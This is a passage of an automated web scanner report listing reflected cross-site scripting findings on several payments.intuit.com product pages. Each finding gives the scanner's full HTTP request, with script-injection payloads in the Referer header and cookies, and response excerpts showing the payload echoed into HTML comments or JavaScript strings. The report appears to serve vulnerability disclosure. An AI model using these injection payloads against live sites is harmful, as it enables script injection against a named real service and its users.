Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d4413--><script>alert(1)</script>903e8593f48

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Gip6gRfT-so3qVBtC6GzuQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960F89B0A0805192AA117E3E7C08A67
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133395

...[SNIP]...
<script>alert(1)</script>903e8593f48 | -->
...[SNIP]...

2.113. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c386'-alert(1)-'4f235ab0373 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FrlChAgtaNosF3G6WcIxAg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960C5470A0805192AA117E35410D15A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133364


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=4c386'-alert(1)-'4f235ab0373';
                   </script>
...[SNIP]...

2.114. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd842'-alert(1)-'54daf563e41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:48 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=kqRkVYeMrNDFvcp7PtLGZQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:49 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D961303D0A0805192AA117E3B8A62CFA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116174


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41';
                   </script>
...[SNIP]...

2.115. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 6a030--><script>alert(1)</script>f0702fdbff1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:56 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=BxeGx4m3z2EJ+m3XOlmO7A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:57 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9614DF20A0805192AA117E30B39989D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116205

...[SNIP]...
<script>alert(1)</script>f0702fdbff1 | -->
...[SNIP]...

2.116. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload addb8'-alert(1)-'021e03ba62f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:14 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Ub5cWhPyc75agcHyjLX5HA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:15 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960AADB0A0805192AA117E39FDA00CC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150347


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f';
                   </script>
...[SNIP]...

2.117. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a2606--><script>alert(1)</script>36ea6b49a2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=qJb8zYJPmpX9fWPDb9drlw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960DDDB0A0805192AA117E34918359D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150376

...[SNIP]...
<script>alert(1)</script>36ea6b49a2c | -->
...[SNIP]...

2.118. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 1478c--><script>alert(1)</script>ce81d71fd63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=1478c--><script>alert(1)</script>ce81d71fd63

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Zvyev1DIPRbxZ1pNkQQ+JA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F84AD0A0805192AA117E37A6A466C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121601

...[SNIP]...
<script>alert(1)</script>ce81d71fd63 | -->
...[SNIP]...

2.119. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caed3'-alert(1)-'2634c597979 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:46 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=l+8G2jJlBi1HTw87YjT0qA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:47 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F54670A0805192AA117E3EA66DDD4
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121568


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=caed3'-alert(1)-'2634c597979';
                   </script>
...[SNIP]...

2.120. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ef8c6--><script>alert(1)</script>b4f50ac6cd0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ef8c6--><script>alert(1)</script>b4f50ac6cd0

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:40 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=bXui4YZA+O-2ZvpBHdsyqQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:41 GMT; Path=/
